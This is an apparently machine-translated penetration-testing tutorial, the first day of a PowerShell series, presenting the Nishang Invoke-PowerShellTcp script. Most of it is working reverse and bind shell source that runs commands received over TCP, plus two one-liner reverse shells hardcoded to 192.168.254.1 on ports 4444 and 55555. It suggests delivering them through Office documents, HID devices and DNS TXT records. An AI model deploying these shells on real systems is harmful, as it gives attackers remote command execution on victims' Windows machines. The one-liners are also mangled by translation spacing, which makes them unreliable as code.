One week PowerShell script Day 1: TCP interactive PowerShell script
PowerShell is a common tool for penetration testers. With the close integration of Windows systems, this allows us to do a variety of interesting things. other hackers who use PowerShell and I have spent a lot of time on PowerShell programming.
However, during my lectures and training, I found that many hackers and defenders do not know what PowerShell can do and how convenient PowerShell is. At the same time, I also met many colleagues who dismissed PowerShell only because it came from Microsoft. To cultivate and spread PowerShell in the industry, I decided to start a one-week PowerShell script tutorial.
Day 1-TCP interactive PowerShell script
Day 2-UDP interactive PowerShell script
Day 3-HTTP/HTTPS interactive PowerShell script
Day 4-WMI interactive PowerShell script
Day 5-ICMP and DNS interactive PowerShell scripts
Not to mention, start the first day of the course.
Day 1: TCP interactive PowerShell script
Let's start with a reverse shell. This great script was submitted by Ben Turner (@ benpturner) and Dave hard (@ davehardy20. How to use this script using metasploit is described in their article. After removing some code from that script and modifying other things, it is the Invoke-PowerShellTcp I provide. This script can provide active or passive connection PowerShell. The current source code is as follows (excluding the help documentation ):
function Invoke-PowerShellTcp{ [CmdletBinding(DefaultParameterSetName="reverse")] Param( [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")] [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")] [String] $IPAddress, [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")] [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")] [Int] $Port, [Parameter(ParameterSetName="reverse")] [Switch] $Reverse, [Parameter(ParameterSetName="bind")] [Switch] $Bind ) #Connect back if the reverse switch is used. if ($Reverse) { $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port) } #Bind to the provided port if Bind switch is used. if ($Bind) { $listener = [System.Net.Sockets.TcpListener]$Port $listener.start() $client = $listener.AcceptTcpClient() } $stream = $client.GetStream() [byte[]]$bytes = 0..255|%{0} #Send back current username and computername $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n") $stream.Write($sendbytes,0,$sendbytes.Length) #Show an interactive PowerShell prompt $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>') $stream.Write($sendbytes,0,$sendbytes.Length) while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding $data = $EncodedText.GetString($bytes,0, $i) #Execute the command on the target. $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String ) $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> ' $x = ($error[0] | Out-String) $error.clear() $sendback2 = $sendback2 + $x #Return the results $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2) $stream.Write($sendbyte,0,$sendbyte.Length) $stream.Flush() } $client.Close() $listener.Stop()}
You can find: https://github.com/samratashok/nishang/tree/master/Shells under the Shells directory of Nishang
The following shows how to run a listener on Kali Linux:
You can also run a listener on a Windows machine. Use powercat:
Use Invoke-PowerShellTcp for active connection:
Interactive PowerShell can help us solve problems in many cases. A good example is to obtain the user's plaintext password on Windows8.1 and Server 2012. In this case, interactive PowerShell must be used.
Note that we can also use powercat.
The listener you choose depends on your situation.
If you have carefully read the Invoke-PowerShellTcp source code, you will find that the source code is relatively short, so it can be used with other attack technologies, such: works with Microsoft MS Office documents, personalized interface devices (see Kautilya), devices to be downloaded, and dns txt records. Using a short script in these scenarios is a good choice. In fact, if you remove the error processing and formatted user input code, it can also be shorter. The following is the Invoke-PowerShellTcpOneLine:
$ Client = New-Object System. net. sockets. TCPClient ("192.168.254.1", 4444); $ stream = $ client. getStream (); [byte [] $ bytes = 0 .. 255 | % {0}; while ($ I = $ stream. read ($ bytes, 0, $ bytes. length)-ne 0) {; $ data = (New-Object-TypeName System. text. ASCIIEncoding ). getString ($ bytes, 0, $ I); $ sendback = (iex $ data 2> & 1 | Out-String ); $ sendback2 = $ sendback + "PS" + (pwd ). path + ">"; $ sendbyte = ([text. encoding]: ASCII ). getBytes ($ sendback2); $ stream. write ($ sendbyte, 0, $ sendbyte. length); $ stream. flush ()}; $ client. close () If you do not need to display the output, the script can be shorter, almost as long as the two Weibo posts: # $ sm = (New-Object Net. sockets. TCPClient ("192.168.254.1", 55555 )). getStream (); [byte [] $ bt = 0 .. 255 | % {0}; while ($ I = $ sm. read ($ bt, 0, $ bt. length)-ne 0) {; $ d = (New-Object Text. ASCIIEncoding ). getString ($ bt, 0, $ I); $ st = ([text. encoding]: ASCII ). getBytes (iex $ d 2> & 1); $ sm. write ($ st, 0, $ st. length )}